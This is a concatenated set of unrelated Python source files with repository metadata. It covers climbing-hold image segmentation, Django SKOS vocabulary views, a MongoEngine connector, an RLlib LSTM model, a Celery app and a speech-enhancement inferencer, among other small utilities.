def find_holds(tiles, predictor, train_metadata, device, save_tiles=True, show_results=False):
masks = dict()
# if tiles is a list of images, load them in memory
if type(tiles) is not dict:
tiles = {tile: Image.open(tile) for tile in tiles}
for tile in tiles:
# im = cv2.imread(image_path)
im = cv2.cvtColor(np.array(tiles[tile]), cv2.COLOR_RGB2BGR)
outputs = predictor(im)
# get hold masks
mask = outputs['instances'].get('pred_masks')
mask = mask.to(device)
_, h, w = mask.shape
bin_mask = np.zeros((h, w))
# build binary mask
for m in mask:
bin_mask = np.add(bin_mask, np.array(m.long()))
masks[tile] = bin_mask
if save_tiles:
p_name = get_processed_name(tile)
cv2.imwrite(p_name, np.array(bin_mask), [cv2.IMWRITE_PNG_BILEVEL, 1])
# cv2.imshow(p_name, np.array(bin_mask))
if show_results:
v = Visualizer(im[:, :, ::-1],
metadata=train_metadata,
# scale=0.75,
scale=0.3,
instance_mode=ColorMode.IMAGE_BW # remove the colors of unsegmented pixels
)
v = v.draw_instance_predictions(outputs["instances"].to(device))
# cv2.imshow('climbnet', v.get_image()[:, :, ::-1])
# cv2.waitKey(0)
return masks
def get_processed_name(tile):
name, _ = os.path.splitext(tile)
name = name.replace('raw', 'processed')
return name + '_processed' + OUTPUT_IMAGE_EXTENSION
def concat_images_v(images_list):
images = [Image.open(i) for i in images_list]
overall_height = sum([i.height for i in images])
dst = Image.new('RGB', (max([i.width for i in images]), overall_height), (255, 255, 255))
h = 0
for im in images:
dst.paste(im, (0, h))
h += im.height
return dst
def main(image_paths, model_path, tile_width, tile_height, combine_results):
if tile_width == 0:
tile_width = None
if tile_height == 0:
tile_height = None
predictor, train_metadata, device = config_detector(model_path)
for image_path in image_paths:
tiles = segment_image_into_tiles(image_path, (tile_width, tile_height), INPUT_DIR, OUTPUT_DIR)
tile_masks = find_holds(tiles, predictor, train_metadata, device, OUTPUT_DIR)
dst = concat_images_v([get_processed_name(tile) for tile in tile_masks])
dst.save(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_hold_masks.png'))
if combine_results:
all_mask = find_holds([INPUT_DIR + '/' + image_path], predictor, train_metadata, device, OUTPUT_DIR)
background = Image.open(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_hold_masks.png'))
img = Image.open(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_processed.png'))
# make black pixels transparent
img = img.convert("RGBA")
datas = img.getdata()
new_data = []
for item in datas:
if item[0] == 0 and item[1] == 0 and item[2] == 0:
new_data.append((255, 255, 255, 0))
else:
new_data.append(item)
img.putdata(new_data)
background.paste(img, (0, 0), img)
background.save(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_superimposed.png'),"PNG")
poly_approx(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_superimposed.png'), os.path.splitext(image_path)[0])
else:
poly_approx(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_hold_masks.png'), os.path.splitext(image_path)[0])
def poly_approx(image, name):
img = cv2.imread(image)
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
_, threshold = cv2.threshold(img_gray, 245, 255, cv2.THRESH_BINARY_INV)
contours, _ = cv2.findContours(threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# For each contour approximate the curve and
# detect the shapes.
approximations = []
for cnt in contours[1::]:
# epsilon = 0.01*cv2.arcLength(cnt, True)
epsilon = 0.005*cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, epsilon, True)
approximations.append([a[0] for a in approx.tolist()])
# print(approx)
cv2.drawContours(img, [approx], 0, (0, 255, 0), 3)
with open('extracted_data/' + name + '_holds.json', 'w') as f:
f.write(json.dumps(dict(holds=approximations)))
# cv2.imshow("final", img)
cv2.imwrite(os.path.splitext(image)[0] + '_contours.png', img)
# cv2.waitKey(0)
return dict(holds=approximations)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Hold detection')
parser.add_argument('images_path', type=str, default='', help='The input wall image file')
parser.add_argument('model_path', type=str, default='', help='climbnet model weights')
parser.add_argument('tile_width', type=int, default=0, help='Tile width')
parser.add_argument('tile_height', type=int, default=0, help='Tile height')
parser.add_argument('combine_results', type=bool, default=False, help='Mix results of split detection and overall detection')
args = parser.parse_args()
f = []
for (dirpath, dirnames, filenames) in walk(args.images_path):
f.extend(filenames)
break
main(f, args.model_path, args.tile_width, args.tile_height, args.combine_results)
# sample run:
# > python .\extract_holds.py raw_images ..\model_weights\model_d2_R_50_FPN_3x.pth 0 600 False | 5,614 | 0 | 138 |
cceb19f18e4db1f1bc90595c42aabfc173275b59 | 5,083 | py | Python | vocabs/views.py | acdh-oeaw/vhioe | 83c8bce83d7cb21150f404409477d2cd1c7ee240 | [
"MIT"
] | 1 | 2017-10-17T10:05:44.000Z | 2017-10-17T10:05:44.000Z | vocabs/views.py | acdh-oeaw/cbab | 7cd25f057913dccf85f851e448b1dbc2c5f8d624 | [
"MIT"
] | 15 | 2017-10-17T09:57:10.000Z | 2021-12-13T19:48:46.000Z | vocabs/views.py | acdh-oeaw/thunau | 06e4d54f4553939ffba3c504088055c3807328c6 | [
"MIT"
] | 1 | 2017-11-09T11:18:24.000Z | 2017-11-09T11:18:24.000Z | from django.views.generic.detail import DetailView
from django.views.generic.list import ListView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse_lazy
from django_tables2 import SingleTableView, RequestConfig
from .models import SkosConcept, SkosConceptScheme, SkosLabel
from .forms import SkosConceptForm, SkosConceptSchemeForm, SkosLabelForm, GenericFilterFormHelper
from .tables import SkosConceptTable
from .filters import SkosConceptFilter
#####################################################
# ConceptScheme
#####################################################
###################################################
# SkosLabel
###################################################
| 29.725146 | 97 | 0.714539 | from django.views.generic.detail import DetailView
from django.views.generic.list import ListView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse_lazy
from django_tables2 import SingleTableView, RequestConfig
from .models import SkosConcept, SkosConceptScheme, SkosLabel
from .forms import SkosConceptForm, SkosConceptSchemeForm, SkosLabelForm, GenericFilterFormHelper
from .tables import SkosConceptTable
from .filters import SkosConceptFilter
class GenericListView(SingleTableView):
filter_class = None
formhelper_class = None
context_filter_name = 'filter'
paginate_by = 25
def get_queryset(self, **kwargs):
qs = super(GenericListView, self).get_queryset()
self.filter = self.filter_class(self.request.GET, queryset=qs)
self.filter.form.helper = self.formhelper_class()
return self.filter.qs
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
return table
def get_context_data(self, **kwargs):
context = super(GenericListView, self).get_context_data()
context[self.context_filter_name] = self.filter
return context
class SkosConceptFilterView(GenericListView):
model = SkosConcept
table_class = SkosConceptTable
template_name = 'vocabs/skosconcept_filter.html'
filter_class = SkosConceptFilter
formhelper_class = GenericFilterFormHelper
class SkosConceptDetailView(DetailView):
model = SkosConcept
template_name = 'vocabs/skosconcept_detail.html'
class SkosConceptListView(ListView):
model = SkosConcept
template_name = 'vocabs/skosconcept_list.html'
class SkosConceptCreate(CreateView):
model = SkosConcept
template_name = 'vocabs/skosconcept_create.html'
form_class = SkosConceptForm
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(SkosConceptCreate, self).dispatch(*args, **kwargs)
class SkosConceptUpdate(UpdateView):
model = SkosConcept
form_class = SkosConceptForm
template_name = 'vocabs/skosconcept_create.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(SkosConceptUpdate, self).dispatch(*args, **kwargs)
class SkosConceptDelete(DeleteView):
model = SkosConcept
template_name = 'vocabs/confirm_delete.html'
success_url = reverse_lazy('vocabs:browse_vocabs')
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(SkosConceptDelete, self).dispatch(*args, **kwargs)
#####################################################
# ConceptScheme
#####################################################
class SkosConceptSchemeDetailView(DetailView):
model = SkosConceptScheme
template_name = 'vocabs/skosconceptscheme_detail.html'
def get_context_data(self, **kwargs):
context = super(SkosConceptSchemeDetailView, self).get_context_data(**kwargs)
context["concepts"] = SkosConcept.objects.filter(scheme=self.kwargs.get('pk'))
return context
class SkosConceptSchemeListView(ListView):
model = SkosConceptScheme
template_name = 'vocabs/skosconceptscheme_list.html'
class SkosConceptSchemeCreate(CreateView):
model = SkosConceptScheme
form_class = SkosConceptSchemeForm
template_name = 'vocabs/skosconceptscheme_create.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(SkosConceptSchemeCreate, self).dispatch(*args, **kwargs)
class SkosConceptSchemeUpdate(UpdateView):
model = SkosConceptScheme
form_class = SkosConceptSchemeForm
template_name = 'vocabs/skosconceptscheme_create.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(SkosConceptSchemeUpdate, self).dispatch(*args, **kwargs)
###################################################
# SkosLabel
###################################################
class SkosLabelDetailView(DetailView):
model = SkosLabel
template_name = 'vocabs/skoslabel_detail.html'
class SkosLabelListView(ListView):
model = SkosLabel
template_name = 'vocabs/skoslabel_list.html'
class SkosLabelCreate(CreateView):
model = SkosLabel
template_name = 'vocabs/skoslabel_create.html'
form_class = SkosLabelForm
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(SkosLabelCreate, self).dispatch(*args, **kwargs)
class SkosLabelUpdate(UpdateView):
model = SkosLabel
form_class = SkosLabelForm
template_name = 'vocabs/skoslabel_create.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(SkosLabelUpdate, self).dispatch(*args, **kwargs)
| 1,423 | 2,428 | 345 |
20800899334a7f9045e3040d9fc79c07a6e2cb14 | 784 | py | Python | api/db/db.py | bcgov/data-stream | 2d8fbf3843ee765ee102f306993fdbc742aca5d8 | [
"Apache-2.0"
] | 1 | 2019-02-10T08:27:22.000Z | 2019-02-10T08:27:22.000Z | api/db/db.py | bcgov/data-stream | 2d8fbf3843ee765ee102f306993fdbc742aca5d8 | [
"Apache-2.0"
] | 18 | 2019-02-09T01:02:09.000Z | 2022-03-30T23:04:24.000Z | api/db/db.py | bcgov/data-stream | 2d8fbf3843ee765ee102f306993fdbc742aca5d8 | [
"Apache-2.0"
] | 2 | 2019-02-09T06:36:54.000Z | 2019-02-12T09:52:58.000Z | from mongoengine import connect
from config import Config
from db.models.subscriptions import Subscriptions
| 34.086957 | 68 | 0.633929 | from mongoengine import connect
from config import Config
from db.models.subscriptions import Subscriptions
class Db:
Subscriptions = None
def __init__(self, createClient=True):
config = Config()
self.db = {}
self.Subscriptions = Subscriptions
self.createClient = createClient
self.initConnection(config)
def initConnection(self, config):
connect(
db=config.data['database']['dbName'],
host=config.data['database']['host'],
port=config.data['database']['port'],
username=config.data['database']['username'],
password=config.data['database']['password'],
authentication_source=config.data['database']['dbName'],
connect=self.createClient)
| 587 | 66 | 23 |
06e43597610cd88482cb86a5d3d21ac4ef2589de | 2,779 | py | Python | gym_continuousDoubleAuction/train/model/model_handler.py | FabianSchuetze/gym-continuousDoubleAuction | cc1b5ddff6c32a882d70d2563596bc7eb32dcd9f | [
"MIT"
] | 96 | 2019-08-15T16:36:01.000Z | 2022-03-29T16:46:49.000Z | gym_continuousDoubleAuction/train/model/model_handler.py | sbhadade/gym-continuousDoubleAuction | dbfeb7e1c1751b318c6e8bc570101d6f856720fe | [
"MIT"
] | 10 | 2019-08-27T08:30:20.000Z | 2022-03-11T23:57:41.000Z | gym_continuousDoubleAuction/train/model/model_handler.py | sbhadade/gym-continuousDoubleAuction | dbfeb7e1c1751b318c6e8bc570101d6f856720fe | [
"MIT"
] | 17 | 2020-04-15T14:44:23.000Z | 2022-03-12T20:39:55.000Z | from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.tf.fcnet_v2 import FullyConnectedNetwork
from ray.rllib.models import Model # deprecated and should not be used.
class CustomModel_1(Model):
"""
Sample custom model with LSTM.
Still working but deprecated and should not be used.
Need to update this class.
see: https://ray.readthedocs.io/en/latest/rllib-models.html
"""
"""
def _build_layers_v2(self, input_dict, num_outputs, options):
hidden = 512
cell_size = 256
#S = input_dict["obs"]
S = tf.layers.flatten(input_dict["obs"])
with tf.variable_scope(tf.VariableScope(tf.AUTO_REUSE, "shared"),
reuse=tf.AUTO_REUSE,
auxiliary_name_scope=False):
last_layer = tf.layers.dense(S, hidden, activation=tf.nn.relu, name="fc1")
last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc2")
last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc3")
last_layer = self._lstm(last_layer, cell_size)
output = tf.layers.dense(last_layer, num_outputs, activation=tf.nn.softmax, name="mu")
return output, last_layer
"""
| 44.822581 | 127 | 0.65923 | from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.tf.fcnet_v2 import FullyConnectedNetwork
from ray.rllib.models import Model # deprecated and should not be used.
class CustomModel_1(Model):
"""
Sample custom model with LSTM.
Still working but deprecated and should not be used.
Need to update this class.
see: https://ray.readthedocs.io/en/latest/rllib-models.html
"""
def _lstm(self, Inputs, cell_size):
s = tf.expand_dims(Inputs, axis=1, name='time_major') # [time_step, feature] => [time_step, batch, feature]
lstm_cell = tf.nn.rnn_cell.LSTMCell(cell_size)
self.init_state = lstm_cell.zero_state(batch_size=1, dtype=tf.float32)
# time_major means [time_step, batch, feature] while batch major means [batch, time_step, feature]
outputs, self.final_state = tf.nn.dynamic_rnn(cell=lstm_cell, inputs=s, initial_state=self.init_state, time_major=True)
lstm_out = tf.reshape(outputs, [-1, cell_size], name='flatten_rnn_outputs') # joined state representation
return lstm_out
"""
def _build_layers_v2(self, input_dict, num_outputs, options):
hidden = 512
cell_size = 256
#S = input_dict["obs"]
S = tf.layers.flatten(input_dict["obs"])
with tf.variable_scope(tf.VariableScope(tf.AUTO_REUSE, "shared"),
reuse=tf.AUTO_REUSE,
auxiliary_name_scope=False):
last_layer = tf.layers.dense(S, hidden, activation=tf.nn.relu, name="fc1")
last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc2")
last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc3")
last_layer = self._lstm(last_layer, cell_size)
output = tf.layers.dense(last_layer, num_outputs, activation=tf.nn.softmax, name="mu")
return output, last_layer
"""
def _build_layers_v2(self, input_dict, num_outputs, options):
hidden = 512
cell_size = 256
S = input_dict["obs"]
last_layer = tf.layers.flatten(S)
last_layer = self._lstm(last_layer, cell_size)
with tf.variable_scope(tf.VariableScope(tf.AUTO_REUSE, "shared"),
reuse=tf.AUTO_REUSE,
auxiliary_name_scope=False):
last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc1")
last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc2")
last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc3")
output = tf.layers.dense(last_layer, num_outputs, activation=tf.nn.softmax, name="mu")
return output, last_layer
| 1,451 | 0 | 54 |
ab1da09f99b9d7d70090d275398149f2669bd51b | 621 | py | Python | model_prefix/models.py | anx-abruckner/django-model-prefix | a5cabf1ac210b6358ea358b1d268d802114d85d4 | [
"MIT"
] | null | null | null | model_prefix/models.py | anx-abruckner/django-model-prefix | a5cabf1ac210b6358ea358b1d268d802114d85d4 | [
"MIT"
] | null | null | null | model_prefix/models.py | anx-abruckner/django-model-prefix | a5cabf1ac210b6358ea358b1d268d802114d85d4 | [
"MIT"
] | 1 | 2021-10-08T13:26:44.000Z | 2021-10-08T13:26:44.000Z | from django.conf import settings
from django.db.models import options
from django.db.models.signals import class_prepared, pre_init
options.DEFAULT_NAMES = options.DEFAULT_NAMES + ('db_prefix',)
pre_init.connect(model_prefix)
class_prepared.connect(model_prefix)
| 28.227273 | 63 | 0.752013 | from django.conf import settings
from django.db.models import options
from django.db.models.signals import class_prepared, pre_init
options.DEFAULT_NAMES = options.DEFAULT_NAMES + ('db_prefix',)
def model_prefix(sender, **kwargs):
# Global defined prefix
prefix = getattr(settings, "DB_PREFIX", None)
# Model defined prefix
if hasattr(sender._meta, 'db_prefix'):
prefix = sender._meta.db_prefix
if prefix and not sender._meta.db_table.startswith(prefix):
sender._meta.db_table = prefix + sender._meta.db_table
pre_init.connect(model_prefix)
class_prepared.connect(model_prefix)
| 331 | 0 | 23 |
f52f7f7f2386b190111a72f56968dc3910c24afe | 225 | py | Python | test/tiles/time_interval_test.py | sergpolly/clodius | 16c2dcba52326e8cd0f02d096b735904b3da95f4 | [
"MIT"
] | 14 | 2018-11-14T23:58:32.000Z | 2021-09-12T13:56:19.000Z | test/tiles/time_interval_test.py | sergpolly/clodius | 16c2dcba52326e8cd0f02d096b735904b3da95f4 | [
"MIT"
] | 71 | 2018-10-30T15:31:24.000Z | 2022-03-20T21:10:19.000Z | test/tiles/time_interval_test.py | sergpolly/clodius | 16c2dcba52326e8cd0f02d096b735904b3da95f4 | [
"MIT"
] | 15 | 2018-10-30T15:31:44.000Z | 2021-12-22T02:23:00.000Z | import clodius.tiles.time_interval as hgti
import os.path as op
| 22.5 | 51 | 0.737778 | import clodius.tiles.time_interval as hgti
import os.path as op
def test_tileset_info():
filename = op.join("data", "sample_htime.json")
hgti.tileset_info(filename)
# TODO: Make assertions about info returned.
| 137 | 0 | 23 |
12d4d0256da740c2a3582b488dd59b67b7c4e8b1 | 636 | py | Python | qatrack/qa/migrations/0048_auto_20200102_1356.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 20 | 2021-03-11T18:37:32.000Z | 2022-03-23T19:38:07.000Z | qatrack/qa/migrations/0048_auto_20200102_1356.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 75 | 2021-02-12T02:37:33.000Z | 2022-03-29T20:56:16.000Z | qatrack/qa/migrations/0048_auto_20200102_1356.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 5 | 2021-04-07T15:46:53.000Z | 2021-09-18T16:55:00.000Z | # Generated by Django 2.1.11 on 2020-01-02 18:56
from django.db import migrations, models
import qatrack.qatrack_core.fields
| 30.285714 | 256 | 0.690252 | # Generated by Django 2.1.11 on 2020-01-02 18:56
from django.db import migrations, models
import qatrack.qatrack_core.fields
class Migration(migrations.Migration):
dependencies = [
('qa', '0047_fix_serialized_uploads'),
]
operations = [
migrations.AddField(
model_name='testinstance',
name='json_value',
field=qatrack.qatrack_core.fields.JSONField(blank=True, editable=True, help_text='Currently used to store results of upload file analysis. Allows you to retrieve results of file upload analysis without having to reanalyze the file', null=True),
),
]
| 0 | 485 | 23 |
d1148f4d27190c9bffce4be88de4cecf1a8da8ad | 219 | py | Python | main.py | CS-Cafe/Rube-Goldberg-Machine | e66643e552ca41a3b51a9d8d22064465300d3bb6 | [
"MIT"
] | 1 | 2021-09-20T01:40:40.000Z | 2021-09-20T01:40:40.000Z | main.py | CS-Cafe/Rube-Goldberg-Machine | e66643e552ca41a3b51a9d8d22064465300d3bb6 | [
"MIT"
] | null | null | null | main.py | CS-Cafe/Rube-Goldberg-Machine | e66643e552ca41a3b51a9d8d22064465300d3bb6 | [
"MIT"
] | null | null | null | from pynput.keyboard import Key, Controller
import time
keyboard = Controller()
try:
while 1:
time.sleep(3)
keyboard.press(Key.alt)
keyboard.press(Key.f4)
except KeyboardInterrupt:
pass
| 18.25 | 43 | 0.675799 | from pynput.keyboard import Key, Controller
import time
keyboard = Controller()
try:
while 1:
time.sleep(3)
keyboard.press(Key.alt)
keyboard.press(Key.f4)
except KeyboardInterrupt:
pass
| 0 | 0 | 0 |
5a668792bed1487d85ba503a8538660f4ba65b76 | 356 | py | Python | hysds/celery.py | hysds/hysds | 839d527114e115603ea0a2c4c1b7fe474f7b7b39 | [
"Apache-2.0"
] | 17 | 2018-04-30T17:53:23.000Z | 2021-11-10T18:24:24.000Z | hysds/celery.py | hysds/hysds | 839d527114e115603ea0a2c4c1b7fe474f7b7b39 | [
"Apache-2.0"
] | 54 | 2017-10-17T23:22:53.000Z | 2022-02-09T22:05:07.000Z | hysds/celery.py | hysds/hysds | 839d527114e115603ea0a2c4c1b7fe474f7b7b39 | [
"Apache-2.0"
] | 9 | 2018-01-13T01:07:21.000Z | 2021-02-25T21:21:43.000Z | from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from celery import Celery
app = Celery("hysds")
app.config_from_object("celeryconfig")
if __name__ == "__main__":
app.start()
| 19.777778 | 39 | 0.817416 | from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from celery import Celery
app = Celery("hysds")
app.config_from_object("celeryconfig")
if __name__ == "__main__":
app.start()
| 0 | 0 | 0 |
821de4baf0a3b8e05bb65e46b824fa407b57833d | 30 | py | Python | tests/instagram/fixtures/endpoints/internal/__init__.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | 13 | 2019-08-07T21:24:34.000Z | 2020-12-12T12:23:50.000Z | tests/instagram/fixtures/endpoints/internal/__init__.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | null | null | null | tests/instagram/fixtures/endpoints/internal/__init__.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | null | null | null |
from .msisdn_header import *
| 10 | 28 | 0.766667 |
from .msisdn_header import *
| 0 | 0 | 0 |
c747dc952f4cbc13c10e968bff59ff2fd4f23bee | 1,246 | py | Python | backend/viperid/utils.py | vaporycommonwealth/viperid | ef910346a096876b36eacfabd86bb551b58ba1af | [
"MIT"
] | null | null | null | backend/viperid/utils.py | vaporycommonwealth/viperid | ef910346a096876b36eacfabd86bb551b58ba1af | [
"MIT"
] | null | null | null | backend/viperid/utils.py | vaporycommonwealth/viperid | ef910346a096876b36eacfabd86bb551b58ba1af | [
"MIT"
] | 1 | 2017-09-25T13:13:27.000Z | 2017-09-25T13:13:27.000Z | from functools import wraps
from werkzeug.exceptions import BadRequest
from flask import request, jsonify
| 27.688889 | 80 | 0.536116 | from functools import wraps
from werkzeug.exceptions import BadRequest
from flask import request, jsonify
def body_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
try:
# Set Force True to allow integration easily with any frontend.
data = request.get_json(force=True)
except BadRequest:
return jsonify(
error={
'message': 'Viperid only accept POST method with data json.'
},
), 400
code = data.get('code', '')
if not code:
return jsonify(
error={
'message': 'Code field is empty'
}
), 400
return f(code, *args, **kwargs)
return decorated_function
def get_error(e: Exception):
message = ''
if hasattr(e, 'msg'):
message = e.msg
elif hasattr(e, 'message'):
message = e.message
elif hasattr(e, 'args'):
message = e.args[0]
return {
'message': message,
'text': e.text if hasattr(e, 'text') else '',
'line_no': e.lineno if hasattr(e, 'lineno') else '',
'source_code': e.source_code if hasattr(e, 'source_code') else []
}
| 1,092 | 0 | 46 |
72d9061cbbb2486c49ca34fb4aa672a7b5f9438e | 7,762 | py | Python | audio_zen/inferencer/base_inferencer.py | ShkarupaDC/FullSubNet | 2aef8b656376a42fbf519e0020636a893b56c4f8 | [
"MIT"
] | 219 | 2020-12-19T02:22:23.000Z | 2022-03-31T13:38:47.000Z | audio_zen/inferencer/base_inferencer.py | ShkarupaDC/FullSubNet | 2aef8b656376a42fbf519e0020636a893b56c4f8 | [
"MIT"
] | 39 | 2021-01-25T06:51:43.000Z | 2022-03-15T22:35:13.000Z | audio_zen/inferencer/base_inferencer.py | ShkarupaDC/FullSubNet | 2aef8b656376a42fbf519e0020636a893b56c4f8 | [
"MIT"
] | 77 | 2020-12-19T13:08:08.000Z | 2022-03-28T06:48:27.000Z | from functools import partial
from pathlib import Path
import librosa
import numpy as np
import soundfile as sf
import toml
import torch
from torch.nn import functional
from torch.utils.data import DataLoader
from tqdm import tqdm
from audio_zen.acoustics.feature import stft, istft
from audio_zen.utils import initialize_module, prepare_device, prepare_empty_dir
if __name__ == '__main__':
ipt = torch.rand(10, 1, 257, 100)
opt = BaseInferencer._unfold_along_time(ipt, 30)
print(opt.shape) | 41.068783 | 128 | 0.643391 | from functools import partial
from pathlib import Path
import librosa
import numpy as np
import soundfile as sf
import toml
import torch
from torch.nn import functional
from torch.utils.data import DataLoader
from tqdm import tqdm
from audio_zen.acoustics.feature import stft, istft
from audio_zen.utils import initialize_module, prepare_device, prepare_empty_dir
class BaseInferencer:
def __init__(self, config, checkpoint_path, output_dir):
checkpoint_path = Path(checkpoint_path).expanduser().absolute()
root_dir = Path(output_dir).expanduser().absolute()
self.device = prepare_device(torch.cuda.device_count())
print("Loading inference dataset...")
self.dataloader = self._load_dataloader(config["dataset"])
print("Loading model...")
self.model, epoch = self._load_model(config["model"], checkpoint_path, self.device)
self.inference_config = config["inferencer"]
self.enhanced_dir = root_dir / f"enhanced_{str(epoch).zfill(4)}"
self.noisy_dir = root_dir / f"noisy"
# self.enhanced_dir = root_dir
prepare_empty_dir([self.noisy_dir, self.enhanced_dir])
# Acoustics
self.acoustic_config = config["acoustics"]
# Supported STFT
self.n_fft = self.acoustic_config["n_fft"]
self.hop_length = self.acoustic_config["hop_length"]
self.win_length = self.acoustic_config["win_length"]
self.sr = self.acoustic_config["sr"]
# See utils_backup.py
self.torch_stft = partial(stft, n_fft=self.n_fft, hop_length=self.hop_length, win_length=self.win_length)
self.torch_istft = partial(istft, n_fft=self.n_fft, hop_length=self.hop_length, win_length=self.win_length)
self.librosa_stft = partial(librosa.stft, n_fft=self.n_fft, hop_length=self.hop_length, win_length=self.win_length)
self.librosa_istft = partial(librosa.istft, hop_length=self.hop_length, win_length=self.win_length)
print("Configurations are as follows: ")
print(toml.dumps(config))
# TODO No dump
# with open((root_dir / f"{time.strftime('%Y-%m-%d %H:%M:%S')}.toml").as_posix(), "w") as handle:
# toml.dump(config, handle)
self.config = config
@staticmethod
def _load_dataloader(dataset_config):
dataset = initialize_module(dataset_config["path"], args=dataset_config["args"], initialize=True)
dataloader = DataLoader(
dataset=dataset,
batch_size=1,
num_workers=0,
)
return dataloader
@staticmethod
def _unfold(input, pad_mode, n_neighbor):
"""
Along the frequency axis, to divide the spectrogram into multiple overlapped sub band.
Args:
input: [B, C, F, T]
Returns:
[B, N, C, F, T], F is the number of frequency of the sub band unit, e.g., [2, 161, 1, 19, 200]
"""
assert input.dim() == 4, f"The dim of input is {input.dim()}, which should be 4."
batch_size, n_channels, n_freqs, n_frames = input.size()
output = input.reshape(batch_size * n_channels, 1, n_freqs, n_frames)
sub_band_n_freqs = n_neighbor * 2 + 1
output = functional.pad(output, [0, 0, n_neighbor, n_neighbor], mode=pad_mode)
output = functional.unfold(output, (sub_band_n_freqs, n_frames))
assert output.shape[-1] == n_freqs, f"n_freqs != N (sub_band), {n_freqs} != {output.shape[-1]}"
# Split the middle dimensions of the unfolded features
output = output.reshape(batch_size, n_channels, sub_band_n_freqs, n_frames, n_freqs)
output = output.permute(0, 4, 1, 2, 3).contiguous() # permute 本质上与 reshape 可是不同的 ...,得到的维度相同,但 entity 不同啊
return output
@staticmethod
def _unfold_along_time(input, context_size):
"""
Along the time axis, split overlapped chunks from spectrogram.
Args:
input: [B, C, F, T]
context_size:
Returns:
[B, N, C, F_s, T], F 为子频带的频率轴大小, e.g. [2, 161, 1, 19, 200]
"""
assert input.dim() == 4, f"The dims of input is {input.dim()}. It should be four-dim."
batch_size, num_channels, num_freqs, num_frames = input.size()
# (i - N,..., i - 1, i)
chunk_size = context_size + 1
# [B, C, F, T] => [B * C * F, T] => [B * C * F, 1, 1, T]
input = input.reshape(batch_size * num_channels * num_freqs, num_frames)
input = input.unsqueeze(1).unsqueeze(1)
# [B * C * F, chunk_size, num_chunks]
output = functional.unfold(input, (1, chunk_size))
# Split the dim of the unfolded feature
# [B, num_chunks, C, F, chunk_size]
output = output.reshape(batch_size, num_channels, num_freqs, chunk_size, -1)
output = output.permute(0, 4, 1, 2, 3).contiguous()
return output
@staticmethod
def _load_model(model_config, checkpoint_path, device):
model = initialize_module(model_config["path"], args=model_config["args"], initialize=True)
model_checkpoint = torch.load(checkpoint_path, map_location="cpu")
model_static_dict = model_checkpoint["model"]
epoch = model_checkpoint["epoch"]
print(f"Loading model checkpoint (epoch == {epoch})...")
model_static_dict = {key.replace("module.", ""): value for key, value in model_static_dict.items()}
model.load_state_dict(model_static_dict)
model.to(device)
model.eval()
return model, model_checkpoint["epoch"]
@torch.no_grad()
def multi_channel_mag_to_mag(self, noisy, inference_args=None):
"""
模型的输入为带噪语音的 **幅度谱**,输出同样为 **幅度谱**
"""
mixture_stft_coefficients = self.torch_stft(noisy)
mixture_mag = (mixture_stft_coefficients.real ** 2 + mixture_stft_coefficients.imag ** 2) ** 0.5
enhanced_mag = self.model(mixture_mag)
# Phase of the reference channel
reference_channel_stft_coefficients = mixture_stft_coefficients[:, 0, ...]
noisy_phase = torch.atan2(reference_channel_stft_coefficients.imag, reference_channel_stft_coefficients.real)
complex_tensor = torch.stack([(enhanced_mag * torch.cos(noisy_phase)), (enhanced_mag * torch.sin(noisy_phase))], dim=-1)
enhanced = self.torch_istft(complex_tensor, length=noisy.shape[-1])
enhanced = enhanced.detach().squeeze(0).cpu().numpy()
return enhanced
@torch.no_grad()
def __call__(self):
inference_type = self.inference_config["type"]
assert inference_type in dir(self), f"Not implemented Inferencer type: {inference_type}"
inference_args = self.inference_config["args"]
